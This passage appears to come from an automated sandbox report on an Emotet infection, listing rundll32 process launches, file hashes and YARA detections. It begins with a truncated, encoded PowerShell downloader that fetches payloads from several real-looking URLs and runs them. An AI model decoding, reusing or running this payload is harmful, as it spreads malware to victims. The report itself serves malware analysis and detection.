wAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA=
                                    Imagebase:0x13f900000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    General

                                    Start time:11:20:40
                                    Start date:25/01/2021
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                                    Imagebase:0xffad0000
                                    File size:45568 bytes
                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:11:20:40
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:20:45
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:20:50
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:20:55
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:00
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:05
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:11
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:16
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:21
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:26
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    General

                                    Start time:11:21:31
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, Author: Joe Security

                                    General

                                    Start time:11:21:36
                                    Start date:25/01/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1
                                    Imagebase:0xde0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, Author: Joe Security

                                    Disassembly

                                    Code Analysis

                                    Reset < >